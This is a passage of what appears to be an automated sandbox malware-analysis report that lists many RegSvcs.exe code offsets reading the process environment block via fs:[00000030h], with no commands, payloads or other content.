            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016265D0 mov eax, dword ptr fs:[00000030h]9_2_016265D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A5D0 mov eax, dword ptr fs:[00000030h]9_2_0165A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A5D0 mov eax, dword ptr fs:[00000030h]9_2_0165A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A05A7 mov eax, dword ptr fs:[00000030h]9_2_016A05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A05A7 mov eax, dword ptr fs:[00000030h]9_2_016A05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A05A7 mov eax, dword ptr fs:[00000030h]9_2_016A05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016445B1 mov eax, dword ptr fs:[00000030h]9_2_016445B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016445B1 mov eax, dword ptr fs:[00000030h]9_2_016445B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01622582 mov eax, dword ptr fs:[00000030h]9_2_01622582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01622582 mov ecx, dword ptr fs:[00000030h]9_2_01622582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01654588 mov eax, dword ptr fs:[00000030h]9_2_01654588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E59C mov eax, dword ptr fs:[00000030h]9_2_0165E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AC460 mov ecx, dword ptr fs:[00000030h]9_2_016AC460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164A470 mov eax, dword ptr fs:[00000030h]9_2_0164A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164A470 mov eax, dword ptr fs:[00000030h]9_2_0164A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164A470 mov eax, dword ptr fs:[00000030h]9_2_0164A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016DA456 mov eax, dword ptr fs:[00000030h]9_2_016DA456
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161645D mov eax, dword ptr fs:[00000030h]9_2_0161645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164245A mov eax, dword ptr fs:[00000030h]9_2_0164245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161E420 mov eax, dword ptr fs:[00000030h]9_2_0161E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161E420 mov eax, dword ptr fs:[00000030h]9_2_0161E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161E420 mov eax, dword ptr fs:[00000030h]9_2_0161E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161C427 mov eax, dword ptr fs:[00000030h]9_2_0161C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A430 mov eax, dword ptr fs:[00000030h]9_2_0165A430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01658402 mov eax, dword ptr fs:[00000030h]9_2_01658402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01658402 mov eax, dword ptr fs:[00000030h]9_2_01658402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01658402 mov eax, dword ptr fs:[00000030h]9_2_01658402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016204E5 mov ecx, dword ptr fs:[00000030h]9_2_016204E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016264AB mov eax, dword ptr fs:[00000030h]9_2_016264AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016544B0 mov ecx, dword ptr fs:[00000030h]9_2_016544B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AA4B0 mov eax, dword ptr fs:[00000030h]9_2_016AA4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016DA49A mov eax, dword ptr fs:[00000030h]9_2_016DA49A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01628770 mov eax, dword ptr fs:[00000030h]9_2_01628770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165674D mov esi, dword ptr fs:[00000030h]9_2_0165674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165674D mov eax, dword ptr fs:[00000030h]9_2_0165674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165674D mov eax, dword ptr fs:[00000030h]9_2_0165674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01620750 mov eax, dword ptr fs:[00000030h]9_2_01620750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662750 mov eax, dword ptr fs:[00000030h]9_2_01662750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662750 mov eax, dword ptr fs:[00000030h]9_2_01662750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AE75D mov eax, dword ptr fs:[00000030h]9_2_016AE75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A4755 mov eax, dword ptr fs:[00000030h]9_2_016A4755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C720 mov eax, dword ptr fs:[00000030h]9_2_0165C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C720 mov eax, dword ptr fs:[00000030h]9_2_0165C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165273C mov eax, dword ptr fs:[00000030h]9_2_0165273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165273C mov ecx, dword ptr fs:[00000030h]9_2_0165273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165273C mov eax, dword ptr fs:[00000030h]9_2_0165273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169C730 mov eax, dword ptr fs:[00000030h]9_2_0169C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C700 mov eax, dword ptr fs:[00000030h]9_2_0165C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01620710 mov eax, dword ptr fs:[00000030h]9_2_01620710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01650710 mov eax, dword ptr fs:[00000030h]9_2_01650710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016427ED mov eax, dword ptr fs:[00000030h]9_2_016427ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016427ED mov eax, dword ptr fs:[00000030h]9_2_016427ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016427ED mov eax, dword ptr fs:[00000030h]9_2_016427ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AE7E1 mov eax, dword ptr fs:[00000030h]9_2_016AE7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016247FB mov eax, dword ptr fs:[00000030h]9_2_016247FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016247FB mov eax, dword ptr fs:[00000030h]9_2_016247FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162C7C0 mov eax, dword ptr fs:[00000030h]9_2_0162C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A07C3 mov eax, dword ptr fs:[00000030h]9_2_016A07C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016207AF mov eax, dword ptr fs:[00000030h]9_2_016207AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D47A0 mov eax, dword ptr fs:[00000030h]9_2_016D47A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C678E mov eax, dword ptr fs:[00000030h]9_2_016C678E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E866E mov eax, dword ptr fs:[00000030h]9_2_016E866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E866E mov eax, dword ptr fs:[00000030h]9_2_016E866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A660 mov eax, dword ptr fs:[00000030h]9_2_0165A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A660 mov eax, dword ptr fs:[00000030h]9_2_0165A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01652674 mov eax, dword ptr fs:[00000030h]9_2_01652674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163C640 mov eax, dword ptr fs:[00000030h]9_2_0163C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163E627 mov eax, dword ptr fs:[00000030h]9_2_0163E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01656620 mov eax, dword ptr fs:[00000030h]9_2_01656620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01658620 mov eax, dword ptr fs:[00000030h]9_2_01658620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162262C mov eax, dword ptr fs:[00000030h]9_2_0162262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E609 mov eax, dword ptr fs:[00000030h]9_2_0169E609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662619 mov eax, dword ptr fs:[00000030h]9_2_01662619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E6F2 mov eax, dword ptr fs:[00000030h]9_2_0169E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E6F2 mov eax, dword ptr fs:[00000030h]9_2_0169E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E6F2 mov eax, dword ptr fs:[00000030h]9_2_0169E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E6F2 mov eax, dword ptr fs:[00000030h]9_2_0169E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A06F1 mov eax, dword ptr fs:[00000030h]9_2_016A06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A06F1 mov eax, dword ptr fs:[00000030h]9_2_016A06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A6C7 mov ebx, dword ptr fs:[00000030h]9_2_0165A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A6C7 mov eax, dword ptr fs:[00000030h]9_2_0165A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C6A6 mov eax, dword ptr fs:[00000030h]9_2_0165C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016566B0 mov eax, dword ptr fs:[00000030h]9_2_016566B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01624690 mov eax, dword ptr fs:[00000030h]9_2_01624690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01624690 mov eax, dword ptr fs:[00000030h]9_2_01624690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01646962 mov eax, dword ptr fs:[00000030h]9_2_01646962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01646962 mov eax, dword ptr fs:[00000030h]9_2_01646962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01646962 mov eax, dword ptr fs:[00000030h]9_2_01646962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0166096E mov eax, dword ptr fs:[00000030h]9_2_0166096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0166096E mov edx, dword ptr fs:[00000030h]9_2_0166096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0166096E mov eax, dword ptr fs:[00000030h]9_2_0166096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C4978 mov eax, dword ptr fs:[00000030h]9_2_016C4978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C4978 mov eax, dword ptr fs:[00000030h]9_2_016C4978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AC97C mov eax, dword ptr fs:[00000030h]9_2_016AC97C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A0946 mov eax, dword ptr fs:[00000030h]9_2_016A0946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4940 mov eax, dword ptr fs:[00000030h]9_2_016F4940
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A892A mov eax, dword ptr fs:[00000030h]9_2_016A892A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B892B mov eax, dword ptr fs:[00000030h]9_2_016B892B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E908 mov eax, dword ptr fs:[00000030h]9_2_0169E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E908 mov eax, dword ptr fs:[00000030h]9_2_0169E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AC912 mov eax, dword ptr fs:[00000030h]9_2_016AC912
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01618918 mov eax, dword ptr fs:[00000030h]9_2_01618918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01618918 mov eax, dword ptr fs:[00000030h]9_2_01618918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AE9E0 mov eax, dword ptr fs:[00000030h]9_2_016AE9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016529F9 mov eax, dword ptr fs:[00000030h]9_2_016529F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016529F9 mov eax, dword ptr fs:[00000030h]9_2_016529F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B69C0 mov eax, dword ptr fs:[00000030h]9_2_016B69C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A9D0 mov eax, dword ptr fs:[00000030h]9_2_0162A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A9D0 mov eax, dword ptr fs:[00000030h]9_2_0162A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A9D0 mov eax, dword ptr fs:[00000030h]9_2_0162A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A9D0 mov eax, dword ptr fs:[00000030h]9_2_0162A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A9D0 mov eax, dword ptr fs:[00000030h]9_2_0162A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A9D0 mov eax, dword ptr fs:[00000030h]9_2_0162A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016549D0 mov eax, dword ptr fs:[00000030h]9_2_016549D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EA9D3 mov eax, dword ptr fs:[00000030h]9_2_016EA9D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016209AD mov eax, dword ptr fs:[00000030h]9_2_016209AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016209AD mov eax, dword ptr fs:[00000030h]9_2_016209AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A89B3 mov esi, dword ptr fs:[00000030h]9_2_016A89B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A89B3 mov eax, dword ptr fs:[00000030h]9_2_016A89B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A89B3 mov eax, dword ptr fs:[00000030h]9_2_016A89B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AE872 mov eax, dword ptr fs:[00000030h]9_2_016AE872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AE872 mov eax, dword ptr fs:[00000030h]9_2_016AE872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B6870 mov eax, dword ptr fs:[00000030h]9_2_016B6870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B6870 mov eax, dword ptr fs:[00000030h]9_2_016B6870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01632840 mov ecx, dword ptr fs:[00000030h]9_2_01632840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01650854 mov eax, dword ptr fs:[00000030h]9_2_01650854
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01624859 mov eax, dword ptr fs:[00000030h]9_2_01624859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01624859 mov eax, dword ptr fs:[00000030h]9_2_01624859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01642835 mov eax, dword ptr fs:[00000030h]9_2_01642835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01642835 mov eax, dword ptr fs:[00000030h]9_2_01642835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01642835 mov eax, dword ptr fs:[00000030h]9_2_01642835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01642835 mov ecx, dword ptr fs:[00000030h]9_2_01642835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01642835 mov eax, dword ptr fs:[00000030h]9_2_01642835
